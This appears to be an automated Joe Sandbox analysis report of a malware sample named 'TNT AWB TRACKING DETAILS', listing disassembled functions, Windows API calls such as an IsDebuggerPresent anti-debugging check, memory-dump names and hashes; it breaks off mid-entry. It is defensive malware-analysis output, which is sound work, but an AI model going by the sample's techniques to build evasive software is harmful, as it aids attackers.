Function 00AA47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00AA4834

Part of subcall function 00AC336C: __lock.LIBCMT ref: 00AC3372
Part of subcall function 00AC336C: DecodePointer.KERNEL32(00000001,?,00AA4849,00AF7C74), ref: 00AC337E
Part of subcall function 00AC336C: EncodePointer.KERNEL32(?,?,00AA4849,00AF7C74), ref: 00AC3389

Part of subcall function 00AA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AA4915
Part of subcall function 00AA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA492A

Part of subcall function 00AA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B68
Part of subcall function 00AA3B3A: IsDebuggerPresent.KERNEL32 ref: 00AA3B7A
Part of subcall function 00AA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B652F8,00B652E0,?,?), ref: 00AA3BEB
Part of subcall function 00AA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA4874

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: d1e8390fff6bc2add41e42e43038c503dc2614f77a6dea9690ed4e1dd2476ed9
Instruction ID: 9b9c0a4fd0b95aff955b2e9bf3dbe0f0ec6794f284094ca6dac2778adc3a95f3
Opcode Fuzzy Hash: d1e8390fff6bc2add41e42e43038c503dc2614f77a6dea9690ed4e1dd2476ed9
Instruction Fuzzy Hash: 79119D729083419BC710EF69E90591ABBF8FF89750F10492EF040872F1DFB89955CB92

Function 00AA5C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00AA5821,?,?,?,?), ref: 00AA5CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00AA5821,?,?,?,?), ref: 00ADDD73

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 16b067c060129a03999d619d15819164030586baa284141e489ea92e72ff9005
Instruction ID: d47a38add6b6a2fe33a8310b21345df444255ad6d201b646f040bcd847400c11
Opcode Fuzzy Hash: 16b067c060129a03999d619d15819164030586baa284141e489ea92e72ff9005
Instruction Fuzzy Hash: A8018071244718BEF7250F24CD8AF763AECAB02778F208319BAE5AB1E0C7B41C558B54

Function 00AC0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AC571C: __FF_MSGBANNER.LIBCMT ref: 00AC5733
Part of subcall function 00AC571C: __NMSG_WRITE.LIBCMT ref: 00AC573A
Part of subcall function 00AC571C: RtlAllocateHeap.NTDLL(013E0000,00000000,00000001,00000000,?,?,?,00AC0DD3,?), ref: 00AC575F

std::exception::exception.LIBCMT ref: 00AC0DEC
__CxxThrowException@8.LIBCMT ref: 00AC0E01

Part of subcall function 00AC859B: RaiseException.KERNEL32(?,?,?,00B59E78,00000000,?,?,?,?,00AC0E06,?,00B59E78,?,00000001), ref: 00AC85F0

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: bad2bb1987e752ba3446affa45d5bbd1a1245bed8a5b9d858bbde4ec69b683ca
Instruction ID: 54eda5452b4d4425fef353bfae3c5a5b988b49f18bd04f7bef26868f1a441ee8
Opcode Fuzzy Hash: bad2bb1987e752ba3446affa45d5bbd1a1245bed8a5b9d858bbde4ec69b683ca
Instruction Fuzzy Hash: A4F0813290031AA6DB15ABA4EE02FDE77ACAF01311F11446EF908A6291DFB09A8486D1

Function 00AC55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC562C
__lock_file.LIBCMT ref: 00AC564D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f36c6da6d22b1db018a009c3012ee065249a2ceb7a59a32eb0c7de7d5c5308ec
Instruction ID: deb9a5f8447eb62178547ae79d7054388e29e3cf79c361dc3ee66362364a8bc1
Opcode Fuzzy Hash: f36c6da6d22b1db018a009c3012ee065249a2ceb7a59a32eb0c7de7d5c5308ec
Instruction Fuzzy Hash: 3901B171C00608ABCF12AF788E02E9E7B61BF90321F4A411DF8241A191EB358A91DF91

Function 00AC53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

__lock_file.LIBCMT ref: 00AC53EB

Part of subcall function 00AC6C11: __lock.LIBCMT ref: 00AC6C34

__fclose_nolock.LIBCMT ref: 00AC53F6

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f54012a79bf3f4e419db836fd3c3163201192300c4dadd52f594aa4358dce218
Instruction ID: 6eb558036afb2549a79c320d3cf24101f926a55f53487b95abeafab919deea76
Opcode Fuzzy Hash: f54012a79bf3f4e419db836fd3c3163201192300c4dadd52f594aa4358dce218
Instruction Fuzzy Hash: 8FF09631D10A449AD711AB759901FAD6AE07F41375F27824CF424AF2C1CFFC99815F51

Function 00AA8061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00AA542F,?,?,?,?,?), ref: 00AA807A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00AA542F,?,?,?,?,?), ref: 00AA80AD

Part of subcall function 00AA774D: _memmove.LIBCMT ref: 00AA7789

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: de8ab0fb8ebdd2c562b656583bd53cd188a5f912a1817d379140bad99040d366
Instruction ID: ccd5fa8fd6ee6de07428bac37ad79a3dfa1cba4daa8bb30a916eadc41ab64956
Opcode Fuzzy Hash: de8ab0fb8ebdd2c562b656583bd53cd188a5f912a1817d379140bad99040d366
Instruction Fuzzy Hash: 59016D72201214BFEB256B25DE4AF7B3B6DEF86760F10802AF905DF1D1DE7198008661

Function 00AAF290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc513d03458f39c05daa7af6d5f03faf55c4a0c5c6087b6995e3b602b1e3df3
Instruction ID: 03985d3ebfd18d5a220ca7b36e2595d2624ec55d88dafd6adf64a6f018c9b6da
Opcode Fuzzy Hash: 4fc513d03458f39c05daa7af6d5f03faf55c4a0c5c6087b6995e3b602b1e3df3
Instruction Fuzzy Hash: 8B619C7060024A9FCB28DFA4C981AABB7F9EF4A300F14847DE9169B291D775ED45CB60

Function 00AB1FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2205ab9841f4e3b928440224e9028db03828f4d1ab143eac450ba651406fad01
Instruction ID: 5bc01f5e4ad72887c3fad04fb8d5f412df1908d8f62845ec7c1df8650c6f62da
Opcode Fuzzy Hash: 2205ab9841f4e3b928440224e9028db03828f4d1ab143eac450ba651406fad01
Instruction Fuzzy Hash: D2517D31B00604AFCF14EF68CA95FAE77AAAF49350F144569F906AB392DB30ED01CB55

Function 03961070 Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 039608E0: GetFileAttributesW.KERNELBASE(?), ref: 039608EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 039611CC

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 182f4af1ae351392f3375f38b64ce7a42cd7c9691fc083210b285472e37583de
Instruction ID: a379be5a094917ebea531e1b419419aea8ff6a5e8da4928ee21f2285ce319989
Opcode Fuzzy Hash: 182f4af1ae351392f3375f38b64ce7a42cd7c9691fc083210b285472e37583de
Instruction Fuzzy Hash: 31518131A1020896EF14DFA0D844BEF733AFF58740F04556DEA0DEB290EB359A85CB65

Function 00AA5AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00AA5B96

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ed5aae5e214b510d369e73a0a971e8d9575d1b02c35cde0fe71a6307f95f4435
Instruction ID: b81c547218e5e37c2afa94503fd08c1e208e7fbab1d5e9651e55004d372b527f
Opcode Fuzzy Hash: ed5aae5e214b510d369e73a0a971e8d9575d1b02c35cde0fe71a6307f95f4435
Instruction Fuzzy Hash: 20315C31A00A05AFCB18DF6CC484A6DF7B5FF45311F158629E81593790E770B990CBA4

Function 00ADFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00ADFCB7

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: dce17a90f2ebbb49ed83bf51028b2af872f14aa9e5b9d29a676d1e0f3c5778c4
Instruction ID: 1b29e024711de5cf6ffae55511e3b0a38b217e5e2663d700006a6801710157e3
Opcode Fuzzy Hash: dce17a90f2ebbb49ed83bf51028b2af872f14aa9e5b9d29a676d1e0f3c5778c4
Instruction Fuzzy Hash: F5410674904341DFDB24DF14C444F1ABBE1BF59318F0988ACE89A8B7A2C772E845CB52

Function 00AA7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7BB3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 41292e0f11f6659f04c39ca27420a656ffec08b7f69e685cf6642529080fbc87
Instruction ID: 1d88bec7144fc86245df1b51359b54571925c56a34b97815260c6ed33cfb011d
Opcode Fuzzy Hash: 41292e0f11f6659f04c39ca27420a656ffec08b7f69e685cf6642529080fbc87
Instruction Fuzzy Hash: E72106B2614B09EBDB14AF16EC41B6E7BB4FB14351F21846EE447CA290EF3091E0D795

Function 00AAC5A7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00AAC5DD

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 74e1cfaf35904c706573917261af4264d6ea1a5ec3dd51edaf6cff79faea5a47
Instruction ID: 773ae9ffe947e2c58cd34756d86c30bfde2ee801745bd7490826cbe03a458af3
Opcode Fuzzy Hash: 74e1cfaf35904c706573917261af4264d6ea1a5ec3dd51edaf6cff79faea5a47
Instruction Fuzzy Hash: 6C116072904119EBDF14EBA6DD819EFB7B8EF56360F504116F825A71D0DB309E05CB90

Function 00AA3F74 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA3FFE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 72369e1982211c92dc933545f6042ecc7be40b06685db1b5e6ead25ba4749d2f
Instruction ID: 0910fbe4057cfc2f3ae82ecf5767ae3fa4f3bef77694fdc5fd8470e00e982e20
Opcode Fuzzy Hash: 72369e1982211c92dc933545f6042ecc7be40b06685db1b5e6ead25ba4749d2f
Instruction Fuzzy Hash: 9B119A72A107019FDB28DF19C451E26B7F5EF8A320B14C82EF54A8B7A1EB30E840CB00

Function 00AA4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00AA4BEF

Part of subcall function 00AC525B: __wfsopen.LIBCMT ref: 00AC5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4E0F

Part of subcall function 00AA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00AA4BA4

Part of subcall function 00AA4C70: _memmove.LIBCMT ref: 00AA4CBA

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 679cec61e5a6dde2bad95a9c8348566b5be8643dd4eaa7da38ff607c62237de9
Instruction ID: cc8cd12f2b0bb9e712878517d5a39638b4fb0ab09f840e4bd2b7d3a9d338a86a
Opcode Fuzzy Hash: 679cec61e5a6dde2bad95a9c8348566b5be8643dd4eaa7da38ff607c62237de9
Instruction Fuzzy Hash: EF119431600205ABDF25BF70C916FAD77A5AFC9710F108429F542A71C1DBF19911AB61

Function 00ADFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00ADFD91

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 397785172dd92ab89b54c4842c97c45db8593b86ca9b5c3c8cb1fb3bcc1d153e
Instruction ID: 725ec10f7f7bebd61eca1e7d84e0d207996284979dfa40f24aa10e14eaed17e7
Opcode Fuzzy Hash: 397785172dd92ab89b54c4842c97c45db8593b86ca9b5c3c8cb1fb3bcc1d153e
Instruction Fuzzy Hash: C52110B4908341DFDB24DF64C444F2ABBE1BF89314F05896CE88A977A2D731E805CB92

Function 00AA774D Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7789

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
Instruction ID: d89eb12682a50ea53a40d47fb41060a7f2c97aacc5c6bfa366f06b8a68a3e359
Opcode Fuzzy Hash: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
Instruction Fuzzy Hash: CE118272209215AFD715AB6CDD81E7FB3A9EF8A720714452AFD19C72D1DF31AC108690

Function 00AA5BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00AA56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AA5C16

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 48330eba1879557f305aa8893518471cccebaa1fe2222a732135c33124a9664d
Instruction ID: 86122ccf33f788b993474d4d54edda9026e809dd02b78b16b77963663f8561f6
Opcode Fuzzy Hash: 48330eba1879557f305aa8893518471cccebaa1fe2222a732135c33124a9664d
Instruction Fuzzy Hash: 08113A31600B059FD3308F29C880B62B7F5EF45761F10C92EE99A8BA91E770E845CB64

Function 00AC4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00AC48A6

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2f197f165d07becb5113f4dcd47b6ee1f8bc5e2a0cb81f3587fb8cf0b7be9ca7
Instruction ID: b219ac603a4192b938904b74734f5c510eb9f762397d62641dae8e3718b8bfff
